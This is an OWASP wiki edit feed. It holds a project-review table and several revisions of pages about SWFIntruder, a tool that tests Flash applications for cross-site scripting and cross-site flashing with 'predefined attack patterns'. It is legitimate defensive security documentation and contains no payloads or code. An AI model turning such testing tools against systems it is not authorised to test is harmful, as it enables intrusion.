align=&quot;CENTER&quot; | Matt Tesauro<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:admin@wirefall.com Dustin Dykes]&lt;br&gt;[http://www.linkedin.com/pub/1/607/6b1 Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:jkpoots(at)rogers.com Kent Poots] &lt;br&gt; [http://www.linkedin.com/pub/5/25B/114 Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; |<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP OpenSign Server Project|OWASP Online code signing and integrity verification service for open source community (OpenSign Server)]]'''<br /> | align=&quot;CENTER&quot; | Phil Potisk and Richard Conway<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:pierre.parrend@insa-lyon.fr Pierre Parrend]&lt;br&gt;[http://www.rzo.free.fr Curriculum]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:a_campani@yahoo.fr Antonio Campanile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP OpenPGP Extensions for HTTP - Enigform and mod openpgp|OWASP OpenPGP Extensions for HTTP - Enigform and mod_openpgp]]'''<br /> | align=&quot;CENTER&quot; | Arturo 'Buanzo' Busleiman<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:mark.roxberry(at)owasp.org Mark Roxberry]&lt;br&gt;[http://www.linkedin.com/in/roxberry Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:dinis.cruz(at)owasp.org Dinis Cruz]<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Orizon Project|OWASP Orizon Project]]'''<br /> | align=&quot;CENTER&quot; | Paolo Perego<br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:seba@deleersnyder.eu Sebastien Deleersnyder]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:dinis.cruz@owasp.org Dinis Cruz]&lt;br&gt;(Confirmed)<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Python Static Analysis Project|OWASP Python Static Analysis]]'''<br /> | align=&quot;CENTER&quot; | Georgy Klimov<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:namn@bluemoon.com.vn Nam Nguyen]&lt;br&gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:diepvien00thayh@gmail.com P.Q.Huy]&lt;br&gt;(Confirmed) <br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Skavenger Project|OWASP Skavenger]]'''<br /> | align=&quot;CENTER&quot; | [mailto:mro(at)securenet.de Matthias Rohr]<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | Rogan Dawes&lt;br&gt;Email address?&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:ah(at)securenet(dot)de Achim Hoffmann]&lt;br&gt;[https://www.owasp.org/index.php/User:Achim Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Sqlibench Project|OWASP SQL Injector Benchmarking Project (SQLiBENCH)]]'''<br /> | align=&quot;CENTER&quot; | [mailto:urgunb@hotmail.com Bedirhan Urgun]&lt;br&gt;[mailto:mesut@h-labs.org Mesut Timur]<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:ferruh@mavituna.com Ferruh Mavituna]&lt;br/&gt; [[Project Information:Sqlibench:Ferruh|background info]]&lt;br/&gt;(Confirmed) <br /> | align=&quot;CENTER&quot; | [mailto:kfuller@dmv.ca.gov Kevin Fuller] &lt;br/&gt;[[Project Information:Sqlibench:Kevin|background info]]&lt;br/&gt;(Confirmed) <br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Teachable Static Analysis Workbench Project|OWASP Teachable Static Analysis Workbench]]'''<br /> | align=&quot;CENTER&quot; | [mailto:ddk(at)cs.msu.su Dmitry Kozlov]&lt;br&gt;Igor Konnov<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:afry(at)strongcrypto.biz Alex Fry]&lt;br&gt;TBC<br /> | align=&quot;CENTER&quot; | <br /> | align=&quot;CENTER&quot; | Not applicable<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP WeBekci Project|OWASP WeBekci Project]]'''<br /> | align=&quot;CENTER&quot; | [mailto:bunyamin@owasp.org Bunyamin Demir]<br /> | align=&quot;CENTER&quot; | Beta<br /> | align=&quot;CENTER&quot; | [mailto:afry(at)strongcrypto.biz Alexander Fry]&lt;br&gt;[http://www.linkedin.com/in/alexanderfry Profile]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:stefano.dipaola(at)wisec.it Stefano Di Paola]&lt;br/&gt;[[User:Wisec|Profile]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Not applicable<br /> |}<br /> <br /> == DESIGN/CORPORATE PROJECTS ==<br /> {| class=&quot;wikitable&quot; style=&quot;text-align:center&quot;<br /> ! width=&quot;600&quot; height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | Application<br /> ! width=&quot;220&quot; align=&quot;CENTER&quot; | '''Author'''<br /> ! width=&quot;60&quot; align=&quot;CENTER&quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''1st&lt;br&gt;Reviewer'''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''2nd&lt;br&gt;Reviewer '''<br /> ! width=&quot;108&quot; align=&quot;CENTER&quot; | '''OWASP&lt;br&gt;Board&lt;br&gt;Reviewer<br /> '''<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Book Cover &amp; Sleeve Design|OWASP Book Cover &amp; Sleeve Design]]'''<br /> | align=&quot;CENTER&quot; | LXstudios,&lt;br&gt;[mailto:deb@lxstudios.com Deb Brewer] <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:yiannis@owasp.org Yiannis Pavlosoglou]&lt;br&gt;[[OWASP NYC AppSec 2008 Conference-SPEAKER-Yiannis Pavlosoglou|Short Bio]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Dinis Cruz<br /> |-<br /> | height=&quot;18&quot; bgcolor=&quot;#FFFFFF&quot; align=&quot;CENTER&quot; valign=&quot;MIDDLE&quot; | '''[[:Category:OWASP Individual and Corporate Member Packs plus Conference Attendee Packs Brief|OWASP Individual &amp; Corporate Member Packs, Conference Attendee Packs Brief]]'''<br /> | align=&quot;CENTER&quot; | LXstudios,&lt;br&gt;[mailto:deb@lxstudios.com Deb Brewer] <br /> | align=&quot;CENTER&quot; | Quality<br /> | align=&quot;CENTER&quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | [mailto:yiannis@owasp.org Yiannis Pavlosoglou]&lt;br&gt;[[OWASP NYC AppSec 2008 Conference-SPEAKER-Yiannis Pavlosoglou|Short Bio]]&lt;br&gt;(Confirmed)<br /> | align=&quot;CENTER&quot; | Dinis Cruz<br /> |-</div> Wisec https://wiki.owasp.org/index.php?title=User:Wisec&diff=33431 User:Wisec 2008-07-04T16:24:29Z <p>Wisec: </p> <hr /> <div>Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab. <br /> <br /> Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private and public companies. He also worked in collaboration with University of Florence at the Faculty of Computer Engineering.<br /> <br /> In the past years he released several advisories including the ones that are not publicly disclosed but patched and several open source tools.<br /> <br /> He's the lead of [[:Category:SWFIntruder|SWFIntruder]] project hosted @ owasp.org. <br /> <br /> He has also contributed to OWASP testing guide and is also the Research &amp; Development Director of OWASP Italian Chapter. Stefano has participated to several international talk as speaker @ 23rd CCC,Owasp Appsec2k7 S.Jose, Google Tech Talk and others.</div> Wisec https://wiki.owasp.org/index.php?title=User:Wisec&diff=33430 User:Wisec 2008-07-04T16:20:59Z <p>Wisec: New page: Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab. Prior to founding Minded Securit...</p> <hr /> <div>Stefano Di Paola is the CTO and a cofounder of [http://www.mindedsecurity.com Minded Security], where he is responsible for Research and Development Lab. <br /> <br /> Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private and public companies. He also worked in collaboration with University of Florence at the Faculty of Computer Engineering.<br /> <br /> In the past years he released several advisories including the ones that are not publicly disclosed but patched and several open source tools.<br /> <br /> He's the lead of [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder] project hosted @ owasp.org. <br /> <br /> He has also contributed to OWASP testing guide and is also the Research &amp; Development Director of OWASP Italian Chapter. Stefano has participated to several international talk as speaker @ 23rd CCC,Owasp Appsec2k7 S.Jose, Google Tech Talk and others.</div> Wisec https://wiki.owasp.org/index.php?title=Category:SWFIntruder&diff=23886 Category:SWFIntruder 2007-12-06T17:27:03Z <p>Wisec: Added Known Issues and a note.</p> <hr /> <div>== SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only open source software.<br /> Thanks to its generality, SWFIntruder is OS independant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyze a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Cross Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavors. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your webserver root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> '''Note''': Don't use '''[[localhost]]''' because Firefox will throw an exception. <br /> better use 127.0.0.1 or 'your.FQDN.ltd'<br /> * Use test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User configurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Known Issues/Bugs ==<br /> <br /> * You could get an error like the following:<br /> *: '''Error: uncaught exception: [Exception... &quot;Security error&quot; code: &quot;1000&quot;'''<br /> *: '''nsresult: &quot;0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)&quot; location:'''<br /> *: '''&quot;http://localhost/swfintruder/js/globalStorage.js Line: 12&quot;]'''<br /> *:Try using the following [http://code.google.com/p/swfintruder/issues/detail?id=1 solutions].<br /> * Sometime Firefox crashes. This is due to some problem in Firefox and not in SWF Intruder itself.<br /> * If you use SWF Intruder under linux, the flash plugin eats a lot of memory.<br /> * There's a pattern for which __resolve does not work:<br /> <br /> frame 1 {<br /> static.main(this)<br /> }<br /> <br /> *:where 'this' is _root but not explicitly set.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]</div> Wisec https://wiki.owasp.org/index.php?title=Category:SWFIntruder&diff=23823 Category:SWFIntruder 2007-12-03T18:08:19Z <p>Wisec: /* SWF Intruder Overview */</p> <hr /> <div>== SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only open source software.<br /> Thanks to its generality, SWFIntruder is OS independant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyze a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Cross Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavors. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your webserver root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> * Use test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User configurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&diff=23822 Category:OWASP Flash Security Project 2007-12-03T18:07:16Z <p>Wisec: </p> <hr /> <div>== Overview ==<br /> <br /> OWASP Flash Security Project is an open project for sharing a knowledge base in order to raise awareness around the subject of Flash applications security.<br /> <br /> == Goals ==<br /> <br /> The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security<br /> <br /> == Tools ==<br /> <br /> Flash security testing [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder]<br /> <br /> == White Papers ==<br /> <br /> [1] '''Testing Flash Applications''' [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007/Agenda Owasp Appsec 2007], 17th May 2007, Milan (Italy).<br /> <br /> [2] '''Finding Vulnerabilities in Flash Applications''' [http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda Owasp Appsec 2007], 15th November 2007, San Jose CA (USA)<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> == Project Sponsors ==<br /> <br /> The Flash Security project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> [[Category:OWASP Project]]<br /> [[Category:OWASP Download]]<br /> [[Category:OWASP Tool]]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&diff=23820 Category:OWASP Flash Security Project 2007-12-03T13:43:48Z <p>Wisec: </p> <hr /> <div>== Overview ==<br /> <br /> OWASP Flash Security Project is an open project for sharing a knowledge base in order to raise awareness around the subject of Flash applications security.<br /> <br /> == Goals ==<br /> <br /> The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security<br /> <br /> == Tools ==<br /> <br /> Flash security testing [https://www.owasp.org/index.php/Category:SWFIntruder SWFIntruder]<br /> <br /> == White Papers ==<br /> <br /> [1] '''Testing Flash Applications''' [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007/Agenda Owasp Appsec 2007], 17th May 2007, Milan (Italy).<br /> <br /> [2] '''Finding Vulnerabilities in Flash Applications''' [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt ppt], Stefano Di Paola, [http://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda Owasp Appsec 2007], 15th November 2007, San Jose CA (USA)<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> == Project Sponsors ==<br /> <br /> The Flash Security project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> [[Category:OWASP Project]]<br /> [[Category:OWASP Download]]<br /> [[Category:OWASP Tool]]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:SWFIntruder&diff=23819 Category:SWFIntruder 2007-12-03T13:27:53Z <p>Wisec: New page: == SWF Intruder Overview == SWFIntruder in action SWFIntruder (pronounced Swiff Intruder) is the first tool specifically developed fo...</p> <hr /> <div>== SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only open source software.<br /> Thanks to its generality, SWFIntruder is OS independant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyze a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Cross Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavors. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your webserver root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> * Use test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User configurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&diff=23818 Category:OWASP Flash Security Project 2007-12-03T13:12:12Z <p>Wisec: </p> <hr /> <div>The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security<br /> <br /> '''SWFIntruder''' is a tool developed by Stefano Di Paola and maintained by [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. <br /> <br /> == SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only open source software.<br /> Thanks to its generality, SWFIntruder is OS independant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyze a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Cross Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavors. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your webserver root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> * Use 